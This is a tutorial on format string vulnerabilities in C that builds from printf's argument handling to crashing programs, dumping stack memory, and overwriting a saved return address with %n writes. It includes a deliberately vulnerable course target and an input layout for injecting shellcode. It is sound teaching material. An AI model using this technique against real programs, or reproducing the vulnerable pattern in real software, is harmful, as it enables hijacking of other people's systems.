Format String Vulnerability

This is the second part of our buffer overflow topic; visit the first part if you need some background information. In this part, we’ll see what the format string vulnerability is and how we can make use of it to exploit a program. This part is more challenging since it requires additional knowledge about format strings and how we can use their features to reach our goal.

a. Intro to format string

The format string should be familiar to us; we use it to print to the console in C/C++ programs. Common format functions are fprintf, printf, sprintf, snprintf, etc. We will focus on printf and snprintf here. Look at the example below:

void PrintName (char *name) {
  printf("My name is %s", name);
}

The format string here is “My name is %s”, where %s is the specifier for a string of characters. A visualization of the stack looks like this:

top of stack                                                bottom of stack
lower memory                                                  higher memory
[--printf() function frame--][-ebp-][-eip-][--params--][--PrintName func frame--]
                                           [&str|&name]
* &str is the address of the format string ("My name is %s")
* &name is the address of the name

Notice that printf receives two params in this case: a format string and a string. What if there are 10 params; how does printf retrieve them? Inside printf, there is an internal pointer that initially points to the second param. When printf encounters a format specifier, it retrieves the corresponding param, and the internal pointer moves towards the bottom of the stack. Another concrete example:

printf("Numbers: %d, %d", 5, 6);

Its stack and internal pointer look like:

top of stack                                           bottom of stack
lower memory                                             higher memory
[--------function frame--------][-ebp-][-eip-][--params--][...]
                                              [&str][5][6]
                                                     ^ (internal pointer
                                                        starts here)
* &str is the address of the format string

This is helpful since we will want to advance this internal pointer in the later discussion.
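To make the “internal pointer” idea concrete, here is a minimal sketch of a toy formatter built on the standard va_list mechanism. The function name mini_format is hypothetical and it only understands %d and %s; a real printf is far more involved. The point is just that every specifier fetches the next argument and advances the pointer, whether or not the caller actually passed one.

```c
#include <assert.h>
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical toy formatter: handles only %d and %s, writes into out. */
void mini_format(char *out, size_t cap, const char *fmt, ...)
{
    va_list ap;          /* plays the role of the "internal pointer" */
    size_t used = 0;

    assert(out != NULL && fmt != NULL && cap > 0);
    out[0] = '\0';
    va_start(ap, fmt);   /* start right after the format string */

    for (const char *p = fmt; *p != '\0' && used + 1 < cap; p++) {
        int n = -1;
        if (p[0] == '%' && p[1] == 'd')
            n = snprintf(out + used, cap - used, "%d", va_arg(ap, int));
        else if (p[0] == '%' && p[1] == 's')
            n = snprintf(out + used, cap - used, "%s", va_arg(ap, const char *));

        if (n >= 0) {                 /* a specifier consumed one argument */
            used += (size_t)n;
            if (used >= cap)
                used = cap - 1;       /* output was truncated */
            p++;                      /* skip the conversion letter */
        } else {                      /* ordinary character: copy it */
            out[used++] = *p;
            out[used] = '\0';
        }
    }
    va_end(ap);
}
```

Calling mini_format(out, sizeof out, "Numbers: %d, %d", 5, 6) fills out with the same text the printf call above would print. Nothing in the loop checks that an argument really exists for each specifier, which is exactly the gap the rest of this post exploits.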

These print functions work great if we follow their design (one param per format specifier). But we can play around with these functions to build exploits. The idea behind the vulnerability is that we provide only the format string, with no params or fewer params than specifiers. Let’s see what we can do in this case.

b. Crash of the program

What if the format string is provided by the user, so that we can change it to whatever we want? One vulnerability here is that a carefully designed input can crash the program. Consider this case:

void foo (char *name) {
  printf("%s%s%s%s%s%s%s%s%s%s\n");
}

Because “%s” displays a string and we have 10 of them here, printf will look at the stack and try to retrieve 10 parameters, interpret each one as the address of a string, and display it. We haven’t supplied any strings, but printf doesn’t know this and will still retrieve 10 parameters as if they existed. This means printf starts from the internal pointer, treats the value there as a string address, moves the pointer towards the bottom of the stack, and repeats until all ten %s have been processed. These “strings” are really other data on the stack. With enough %s specifiers, printf is likely to hit a value that is not a valid address (for example, one that points into unmapped memory), and then the program will crash.
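For contrast, here is a minimal sketch of the non-vulnerable pattern: the format string is a fixed literal and the user’s text is passed only as data. The helper name format_name_safely is made up for this illustration.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Copies user_input into out without ever interpreting it as a format. */
int format_name_safely(char *out, size_t cap, const char *user_input)
{
    assert(out != NULL && user_input != NULL);
    /* The format is the literal "%s"; user_input is only an argument. */
    return snprintf(out, cap, "%s", user_input);
}
```

With this version, an input such as “%s%s%s%s” is copied out character by character instead of making the function read four pointers off the stack.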

c. Viewing the memory

By using the same trick, we can view the process memory, just like in gdb:

printf ("%08x,%08x,%08x,%08x,%08x\n");

“%08x”, like “%s”, is a format specifier; it displays data as a hexadecimal number zero-padded to 8 digits. “,” is just a separator. We might get something like:

40012980,080628c4,bffff7a4,00000005,08059c04

Here, each “%08x” advances the internal stack pointer of the format function towards the bottom of the stack by 4 bytes. Why? Look at the visualization of the stack:

top of stack                                           bottom of stack
lower memory                                             higher memory
[<------------------------------------------------------------stack]
[------print function frame------][ebp][eip][params][Caller's frame]
                                           [-&str-][...]
                                                   ^ (internal pointer
                                                      starts here)

In the earlier example, we had corresponding params (for example, name for %s). When printf encounters a specifier in the format string, it retrieves the value at the internal pointer and moves the pointer to the next memory address. Here we don’t have other params on the stack, but we do have “%08x”. In this case, the internal pointer starts at the caller’s frame and moves towards the bottom of the stack by 4 bytes for each %08x.
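When experimenting, it is handy to generate the dump string instead of typing it. The helper below is a small sketch (the name build_stack_dump_format is my own) that repeats “%08x,” a given number of times; unlike the hand-written string above, it leaves a trailing comma.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Writes `count` copies of "%08x," into out.
 * Returns 0 on success, -1 if out is too small. */
int build_stack_dump_format(char *out, size_t cap, size_t count)
{
    static const char spec[] = "%08x,";
    const size_t spec_len = sizeof spec - 1;   /* 5 characters */

    assert(out != NULL);
    if (cap < count * spec_len + 1)
        return -1;
    for (size_t i = 0; i < count; i++)
        memcpy(out + i * spec_len, spec, spec_len);
    out[count * spec_len] = '\0';
    return 0;
}
```

Each copy of the specifier moves the internal pointer by one 4-byte slot on the 32-bit layout discussed here, so count controls how deep into the stack the dump reaches.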

d. Writing to an arbitrary address

Another tool we will use is the format specifier “%n”. It prints nothing; instead, it stores the number of characters printed so far (before the occurrence of %n) into the int that the corresponding argument points to. For example:

#include <stdio.h>

int main(void) {
  int i;
  printf("12345%n\n", &i);   /* %n stores 5 into i */
  printf("value of i is: %d\n", i);
  return 0;
}

Result: 12345
        value of i is: 5 (before %n, there are 5 chars)

More examples can be found at tutorialspoint.

Our final goal is to change the saved return address so that our shellcode gets executed. By using %n, we can write to an arbitrary address, which means we can change the saved eip, and the problem is solved.

In the above example, we successfully wrote the number 5 to the address of variable i. Imagine the argument ‘&i’ doesn’t exist, as in sections b and c. printf will then take whatever value the internal pointer points to, treat it as an address, and write the number 5 there. Since we can move that pointer towards the bottom of the stack, we can usually make it point to a stack slot whose content we control (for instance, part of our own input) and store the address of the saved eip there. Then we can change the saved eip to whatever we want by using %n.

But the first big problem is that an address is usually a large number. Say 0xbfffffca is the address of the shellcode. If we want to change the saved eip to this value by the above naive method, we have to put 3221225418 chars before %n. It’s nearly impossible to have a buffer of such a huge size.

One method we can use here is that, instead of having the real characters before %n, we can use another format specifier as a “placeholder.” For example:

int a;
printf("%10d%n\n", 1024, &a);
printf("value of a is: %d\n", a);

Result: 
      1024
value of a is: 10

Here, %10d means: read the corresponding argument, which is 1024, and print it as an integer padded with spaces to a field width of at least 10 characters. It doesn’t matter how many digits the argument has, as long as it fits in the width; any number (2048/123/…) is OK. Since 10 chars are printed before %n, the value of ‘a’ is set to 10 in this case. So with this method, we can make %n store a large number without actually placing that many chars before %n in the format string. Also, notice that other specifiers with a width, such as %10f, %10u, or %10x, work here as well.
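A quick way to convince yourself that the stored count follows the field width, not the digits of the argument, is the sketch below. The function name count_after_width10 is hypothetical, and the code assumes a C library that honours %n (glibc does; some platforms restrict or disable it).

```c
#include <assert.h>
#include <stdio.h>

/* Returns the count that %n stores after printing `value` with "%10d". */
int count_after_width10(int value)
{
    char scratch[64];
    int count = -1;

    /* Literal format string; %n receives a valid int pointer. */
    snprintf(scratch, sizeof scratch, "%10d%n", value, &count);
    return count;
}
```

For 1024, 123 or any other value that fits into 10 characters, the function returns 10. A value that needs more room, such as -2147483647 (11 characters with the sign), yields 11, because the width is only a minimum.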

But the above method also has a limitation: it still can’t comfortably handle numbers that are too big, e.g., a full 4-byte memory address, which would need a field width in the billions.

There are two solutions here. One solution applies when the current saved eip is close to the address of our shellcode: we don’t need to change all 4 bytes. For example, for 0xbfffffca -> 0xbffffeca, the upper 2 bytes are the same, so we only need to change the lower 2 bytes (a 2-byte write can be done with %hn, which stores the count into a short). With the above method, we calculate 0xfeca = 65226, and we are good to go.
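The 2-byte variant can be tried in isolation. The sketch below assumes the standard %hn conversion, which stores the running count into a short instead of an int; the function name and the scratch buffer size are my own choices for the illustration.

```c
#include <assert.h>
#include <stdio.h>

/* Pads the output to 65226 (0xfeca) characters and lets %hn store
 * that count into a 2-byte short. Returns the stored 16-bit value. */
unsigned low_half_written_by_hn(void)
{
    static char scratch[70000];   /* large enough for the padded output */
    short half = 0;

    snprintf(scratch, sizeof scratch, "%65226d%hn", 0, &half);
    return (unsigned short)half;  /* view the 16 stored bits as unsigned */
}
```

On a typical platform the function returns 0xfeca. In an exploit, the pointer handed to %hn would be the address of the saved eip, so only its two low bytes change.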

Another solution is to change 1 byte at a time; after 4 writes, the saved eip holds the value we want. But there are 2 points we need to be careful about: 1) %n is cumulative: a later %n counts all chars printed before it.

int a,b,c,d;
printf("%10d%n%20d%n%30d%n%40d%n", 1024, &a, 1024, &b, 1024, &c, 1024, &d);

Result: 
a: 10  b: 30  c: 60  d: 100

2) every %n write to a memory location is always 4 bytes wide.

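This might be confusing, since we want to change 1 byte at a time but every write is 4 bytes. Let’s assume the four %n specifiers pick up the addresses target, target+1, target+2 and target+3 from the stack (target being the address we’d like to modify), and look at the following example:

printf("%10d%n%20d%n%30d%n%40d%n");

The four bytes starting at target will then hold 0A 1E 3C 64 (hex), from the lowest address up. Each %n writes a 4-byte little-endian int, so only its lowest byte survives: the three upper bytes are overwritten by the next write, which starts one byte higher. The last write also zeroes the 3 bytes that follow target+3.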
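The overlapping writes are easier to follow when replayed on a plain byte array. The sketch below does not call printf at all; it simulates four 4-byte little-endian stores of the counts 10, 30, 60 and 100 at offsets 0 to 3. The function names and the 0xAA marker for untouched bytes are assumptions made for the illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Stores a 32-bit value at mem[offset..offset+3], lowest byte first. */
void store_le32(unsigned char *mem, size_t offset, uint32_t value)
{
    for (int i = 0; i < 4; i++)
        mem[offset + i] = (unsigned char)(value >> (8 * i));
}

/* Replays the four %n writes (counts 10, 30, 60, 100) at offsets 0..3. */
void replay_four_writes(unsigned char mem[8])
{
    static const uint32_t counts[4] = { 10, 30, 60, 100 };

    assert(mem != NULL);
    memset(mem, 0xAA, 8);              /* 0xAA marks untouched bytes */
    for (size_t k = 0; k < 4; k++)
        store_le32(mem, k, counts[k]); /* each write starts 1 byte higher */
}
```

After the call, mem holds 0A 1E 3C 64 00 00 00 AA: one surviving byte per write, three bytes clobbered past the target, and the last byte untouched.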

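Thus, we can use this method to write a 4-byte address onto the stack. For example, to write 0xbffffca4, we write the bytes a4 fc ff bf in that order (little-endian). “%164d%n%88d%n%3d%n%192d%n” should work here: the running counts are 164 (0xa4), 252 (0xfc), 255 (0xff) and 447 (0x1bf). The last step uses the overflow trick, which we need whenever the next byte is smaller than the current one: since 0xbf < 0xff, we aim for 0x1bf instead of 0xbf; the extra 1 spills into the next byte and only 0xbf lands in the byte we care about. Keep in mind that a field width is only a minimum: if the value consumed by a %d needs more characters than the width (say, more than 3 for %3d), add 256 to that width.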

e. Example

Now, let’s apply all we learned before. Look at the following example target code:

#include <stdio.h>
#include <stdlib.h>

int foo(char *arg)
{
  char buf[480];
  snprintf(buf, sizeof buf, arg);
  return 0;
}

int main(int argc, char *argv[])
{
  if (argc != 2)
    {
      fprintf(stderr, "target5: argc != 2\n");
      exit(EXIT_FAILURE);
    }
  foo(argv[1]);

  return 0;
}

The snprintf() function formats a series of characters and values and stores them in the array buf. But the format string is under the user’s control, which makes a format string exploit possible.

My exploit design / input string layout: 4*<address-dummy pair><stackpop><write-code><NOPS><shellcode>:

<address-dummy pair>: “\x9c\xfc\xff\xbf\x01\x01\x01\x01”, an address at which we want to modify one byte, followed by a 4-byte dummy value. Since we will later use %d%n, we need a dummy value between the addresses to give each %d something to consume, so that no address is skipped.

<stackpop>: “%08x”, each of which advances the internal pointer by 4 bytes. Inside the format function, we want this pointer to point to the first ADDR, i.e., the beginning of the buffer where our address-dummy pairs are located. By trying several times, we can find out how many we need. (Here, we need 2 to skip ebp and eip.)

<write-code>: of the form %<x>d%n, repeated 4 times, where x is an integer field width. We need four of these since we write to four different addresses, 1 byte each time.

We also want to insert some NOPs before the SHELLCODE to increase flexibility. Combining all of them, we get the designed input string to exploit the target. Full exploit code can be found in my GitHub repo at the end.
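As a rough illustration of the first part of the layout only, the sketch below assembles the four address-dummy pairs for a given slot address. It is not the full exploit; the function name is hypothetical, and the address 0xbffffc9c and the dummy 0x01010101 are simply the values from the pair shown above.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Fills out[32] with four <address><dummy> pairs for the addresses
 * ret_slot, ret_slot+1, ret_slot+2 and ret_slot+3. */
void build_address_dummy_pairs(uint32_t ret_slot, unsigned char out[32])
{
    static const unsigned char dummy[4] = { 0x01, 0x01, 0x01, 0x01 };

    assert(out != NULL);
    for (uint32_t k = 0; k < 4; k++) {
        uint32_t addr = ret_slot + k;
        unsigned char *pair = out + 8 * k;

        /* address bytes, lowest byte first (x86 is little-endian) */
        for (int i = 0; i < 4; i++)
            pair[i] = (unsigned char)(addr >> (8 * i));
        memcpy(pair + 4, dummy, sizeof dummy);
    }
}
```

For 0xbffffc9c the first pair comes out as 9c fc ff bf 01 01 01 01, and the next three start with 9d, 9e and 9f. Because the input travels through argv, none of these bytes may be zero, which is one reason to pick a dummy like 0x01010101.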

The example code is taken from the coursework of COMPSCI642: Introduction to Information Security taught by Prof. Earlence Fernandes @ the University of Wisconsin-Madison.

Thanks for reading! Now we’ve finished all of our discussion about buffer overflow and format string vulnerabilities. Any comments or suggestions will be appreciated.

Kai